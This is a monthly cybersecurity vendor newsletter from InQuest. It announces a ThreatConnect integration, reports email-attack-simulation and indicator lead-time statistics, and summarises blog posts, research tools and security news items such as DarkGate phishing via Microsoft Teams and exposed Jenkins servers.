ThreatConnect and InQuest are excited to announce the availability of a new integration between InQuest InSights Threat Intelligence and ThreatConnect’s TI Ops Platform.

InQuest’s high-fidelity threat intel is derived from our at-scale file analysis of malware and enriched with a variety of open-source and proprietary reputation sources. The integration with ThreatConnect’s TI Ops Platform makes InQuest’s indicators of compromise (IOCs) available for use by CTI analysts, and a wide variety of SIEM and security analytic tools, and endpoint, network, and cloud security solutions to improve their detection capabilities while reducing false positives.

View our listing on the ThreatConnect marketplace.

Download the InQuest InSights Integration here!

InQuest Email Attack Simulation

This month we harvested 552 samples from the wild capable of bypassing either Microsoft or Google. Of those, Microsoft missed 170 (31%), and Google missed 195 (35%). InQuest, MailTAC for reference, missed only 21 (.04%). The distribution of misses by file type is depicted below:

InQuest EAS includes samples sourced from 50+ industry leading blogs. This month, we sourced 33 samples from these blogs for inclusion in attack simulation.

Want to validate the efficacy of your email security stack? InQuire here for a one-month free email attack simulation.

Lab's IOC Lead Time

Every month, we conduct an analysis to ascertain the lead time for our C2 (Command and Control) and TI (Threat Intelligence) compared to public blogs. Over the past 30 days, we've examined a total of 388 indicators. Our findings reveal 5 instances of C2 victories and 33 successes in Threat Intelligence and Dark Web (TIDB) across 17 distinct sources. This data points to an average lead time of 213 days for these indicators, covering 9% of the observed IOCs.

InQuest Latest Blog Posts

How to Take Control of Your Data During Data Privacy Week

Posted on 2024-01-23 by Katie Brown

In today’s digital age, data privacy is more critical than ever. Started by the National Cybersecurity Alliance (NCA), Data Privacy Week continues to spread awareness about data privacy while educating individuals and organizations on how to secure personal information. This year’s theme is “Take Control of Your Data.”

Shortcut To Malice: URL Files

Posted on 2024-01-29 by Darren Spruell

Internet Shortcut files, or URL files, present an interesting opportunity to reflect on how unextraordinary file types present security risks and become an enabling technology for criminal activity when coupled with the right vulnerabilities. At InQuest, we specialize in adversaries’ abuse of complex, evasive file types for malicious ends, helping customers with solutions that are optimized to provide resilient countermeasures against cybersecurity threats.

An Introduction to Deep File Inspection ® (DFI)

Posted on 2024-01-17 by InQuest Staff

Deep File Inspection®, or DFI®, is the reassembly of packets captured off of the wire into application-level content that is then reconstructed, unraveled, and dissected (decompressed, decoded, decrypted, deobfuscated) in an automated fashion. This enables our applied analytics to better determine the intent by examining the file contents (containers, objects, etc.) as an artifact.

RetroHunt ®: Retrospective Analysis for Threat Hunters

Posted on 2024-01-17 by InQuest Staff

InQuest helps organizations in both threat hunting and incident response through the use of RetroHunt ®, our automated retrospective analysis capability. With our RetroHunt technology, your Security Operations Center (SOC) team can uncover historical threats, validate custom detection logic, and monitor for attacks or threat actors of interest.

InQuest Labs Research Spotlight

Holehe

Holehe checks if an email is attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Living Off Trusted Sites (LOTS) Project

Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. This list of websites allow attackers to use their domain or subdomain.

excelCPU

Someone created a fully functional 16-Bit 3Hz CPU in Excel!!! with 128KB of RAM 16 color display, and a custom assembly language to run some programs in it.

Global Security Events

China-Linked Hackers Target Myanmar's Top Ministries with Backdoor Blitz

The China-based threat actor known as Mustang Panda is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.

DarkGate malware delivered via Microsoft Teams - detection and response

While most end users are well-acquainted with the dangers of traditional phishing attacks, such as those delivered via email or other media, a large proportion are likely unaware that Microsoft Teams chats could be a phishing vector. Most Teams activity is intra-organizational, but Microsoft enables External Access by default, which allows members of one organization to add users outside the organization to their Teams chats. Perhaps predictably, this feature has provided malicious actors a new avenue by which to exploit untrained or unaware users.

45k Jenkins servers exposed to RCE attacks using public exploits

Researchers found roughly 45,000 Jenkins instances exposed online that are vulnerable to CVE-2024-23897, a critical remote code execution (RCE) flaw for which multiple public proof-of-concept (PoC) exploits are in circulation.

Useful Links

Support

Social

X.com

GitHub

InQuest Insider - Your monthly resource for the latest in cyber security news, trends, tips, and tools. Subscribe here.

Unsubscribe here.